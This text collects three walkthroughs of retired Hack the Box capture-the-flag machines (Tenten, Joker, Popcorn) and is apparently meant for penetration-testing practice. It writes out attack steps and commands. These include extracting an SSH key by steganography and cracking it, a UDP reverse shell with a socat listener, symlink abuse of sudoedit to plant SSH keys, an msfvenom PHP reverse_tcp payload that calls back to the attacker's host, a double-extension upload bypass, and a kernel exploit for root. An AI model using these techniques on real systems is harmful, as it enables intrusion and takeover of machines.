Hack the Box Challenge: Tenten Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Tenten” which is available online for those who want to increase their skill in penetration testing and black box testing. Tenten is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.10 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.10
From given below image, you can observe we found port 22,80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser following page indicates that is a wordpress website which is remarkable indication for my next step.

Now we decided to use wpscan –u http://10.10.10.10/ –enumerate t –enumerate t –enumerate u command on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins etc.

The wpscan has enumerated the usernames where we have found the login credentials as takis.

Now we have clicked on Sign Up to register on the site. And we saw Jobs Listing as shown below.

After giving the details about the job. Click on apply now.

After clicking on apply now, the webpage opened is shown below.

As you can see from the previous image, we have made an alight change in the URL. In which we have simply changed the end number by /10/ which opened a page stating Job application as you can see below.

As you can see we have again changed the end number in the URL by 11 and this time it opened a page stating Cube.

So as to avoid wastage of time. We have simply captured the request of the page using burpsuite and sent to intruder for fuzzing.

After that inside intruder we have selected the position 8 as highlighted in below image where we want to use brute forcing through burpsuite. 

We have selected the Payload type as Numbers where we have specified the number range as shown below.

As you can see the attack has begun. By selecting payload 13 which made us think there might be something different about this page and there we saw the title of the page which is HackerAccessGranted as you can see below.

As we know in wordpress there is directory structure for the uploaded files is recognized by /wp-content/uploads/%year%/%month%/%filename% then I connect HackerAccessGranted with an Image file and at last after so many attempt I execute use following URL.

http://10.10.10.10/wp/-content/upload/2017/04/ HackerAccessGranted.jpg

Finally!! It shown a hacker image on this web page and without wasting time I downloaded this image.

Since it was an image of a hacker with message Access Granted but I was pretty sure that it is steganography and there are some chances of hidden text within this image therefore next I choose to use Steghide tool.

stedghide extract -sf HackerAccessGranted.jpg

From given below image you can observe that it has extract .jpg image into “id_rsa”

When I try to open this file, it required password to view its content.

Formerly I download a python script from here for cracking the password of this file. Then I ran following command and got desired output.

python sshng2john.py id_rsa > ssh_login

“superpassword” we got as result from executing above command.

And without wasting time I execute following command for login into SSH using superpassword as password.

ssh -i id_rsa takis@10.10.10.10

Great!!  I logged in successfully and check Takis’s privileged and roles using sudo -l and found he has all privileged and an indication for a directory /bin/fuckin with NOPASSWD.

First I explore current directory where I found user.txt and use cat command for reading.

cat user.txt

Successfully completed 1^st task.

Then move into /bin/fuckin where I found same file user.txt then without wasting I enrolled into root directory for finding root.txt.

cd /root

Here I found user.txt and use cat command for reading.

cat root.txt

Successfully completed 2^nd task.

Solving this lab was quite captivating especially steganography for hiding ssh password is remarkable effort done by author. 

Enjoy Hacking!!

Hack the Box Challenge: Joker Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Joker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Legacy lab.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP. The IP of Joker is 10.10.10.21 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.21

From given below image, you can observe we found port 22, 3128 are open in victim’s network.

After completing the Aggressive scan we use UDP scan to further enumerate the ports and find port 69 and 5355 are open.

After finding that the target machine is running tftp, we find a file called passwords we download the file and find that it consist of some hashes.

tftp 10.10.10.21

tftp > get passwords

After downloading the file we use john the ripper to crack the hashes using rockyou.txt wordlist. We find the password to be ihateseafood for user kalamari.

As we know the target machine is running as squid proxy, we configure our browser to redirect the traffic through the target machine.

Now when we try to access the target machine on our browser we are unable to access any page.

Now as we are running redirecting all the traffic through the proxy server we try to open localhost on our browser to check if there are any changes in the behaviour. As soon as we open localhost on our browser we are greeted with a login popup.

We use the password and username we found by cracking the hashes to login into the page.

We use dirb to enumerate the directories and find /console directory.

dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r

When we open the console directory and found a page that acts as an interpreter for python.

Now we use python reverse shell to gain access to the target machine but TCP reverse shell doesn’t work on the system so we use UDP reverse shell to gain access of the system.

We use socat to setup our listener as netcat was not able to provide a stable tty shell for us to run our commands.

socat file:’tty’,echo=0,raw udp-listen:4444

After gaining reverse shell we take a look at the sudoers file and find that we can run a command called sudoedit on file /var/www/*/*/layout.html as alekos. Sudo edit is a command that can be use to edit any file on the system.

Enumerating through the directories we find .ssh folder in /home/alekos folder.

Now as the file listed in the sudoers list is using wildcard we can use symlink to link a file that can be edited using sudoedit. As we found the .ssh folder for user alekos we link the authorized_keys with layout.html to edit the authorized_keys and add our keys , so that we can gain access through ssh using our own private key.

cd /var/www/

cd testing

mkdir test

cd test

ln –s /home/alekos/.ssh/authorized_keys layout.html

Now we use sudoedit as user alekos to edit alekos’s authorized_keys.

sudoedit –u alekos /var/www/testing/test/layout.html

Now we generate keys on our system so that we can copy the public key into authorized_keys and use our private key to login.

ssh-keygen

Now we open the public key that we just generated and copy it.

cat id_rsa.pub

We copy it in our target machine and save it.

Now we use the private key we generated to login through ssh to the target machine. As soon as we login through ssh we find user.txt in the home directory of alekos we open it and find the first flag.

ssh –i id_rsa alekos@10.10.10.21

We start enumerating the directories; in the backup directory we find a few tape archive files when we extract them we find that it contains the backup for development directory

Now we rename the development directory to dev/ and use symlink to link the root directory to the development directory.

mv development dev/

ln -s root development

We then wait for a few minutes for the file to create backup for the new development folder. As the development is linked to root folder it will create a backup for the root folder. Now we open the new tape archive file that is created and find a file called root.txt we open it and find the final flag.

Hack the Box Challenge: Popcorn Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Popcorn” which is available online for those who want to increase their skill in penetration testing and black box testing. popcorn is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.6 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.6

From given below image, you can observe we found port 22,80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue for the next step.

Next we have used dirb tool of kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6 . After checking most of the directories, we finally decided to go for /torrent directory.

So next we decided to explore http://10.10.10.6/torrent/ through browser URL and what we see is a Webpage shown below. After looking at the page for some clue, we saw that we need to register on this site first.

After clicking on Register option on the Webpage. The registration form opened is shown below. As you can see you need give details to successfully register on this site.

After successfully registering on the website. Click on Upload option and the page opened is shown below. Now here we have given the path of any torrent file. Then Click on upload.

When the torrent file is successfully uploaded the next page we are redirected to is shown below. Now simply click on Edit this torrent option.

Now using metasploit we have created a payload in php by using command msfvenom –p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 –f raw .

Now the problem we got was while we are uploading a php file in the update screenshot option it was not taking a php file. So what we did here is renamed the file with php.png which is 123.php.png . And Clicked on Submit Screenshot.

But before clicking on submit screenshot we have captured the request of this page using Burp Suite. Where you can see our file with double extension has been successfully submitted.

As you can see have edited the file name to 123.php. Now Click on Forward option in burp suite.

Next we saw that our file has been successfully uploaded.

Next we have again used dirb tool of kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6/torrent/ . After checking most of the directories, we finally decided to go for /torrent/upload/ directory.

So next we decided to explore http://10.10.10.6/torrent/upload/ through browser URL and what we see is a Webpage shown below. We see that our file has been successfully uploaded. By click on the file we have uploaded.

We have used metasploit’s and got the meterpreter as you can see below.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.3
msf exploit(multi/handler) set lport 4321
msf exploit(multi/handler) exploit
Once we have got the meterpreter. We have used command cd /home. Than we check inside the george directory using command ls /home/george, here we found out the user.txt file and read the file content which contains our first FLAG!!

Now have searched kernel explit on google , where we found that it is an exploit which is used for getting Local privilege escalation. We have simply downloaded the file on our Desktop.

As you can see we have uploaded using the command upload /root/Desktop/15704.c Now we have used command shell to access the root privilege. Now we have compiled. Next we have given permission to the exploit. Using cd /root command we have found root.txt file. And to view the contents we have used cat root.txt command. In the end we have found our Final FLAG!!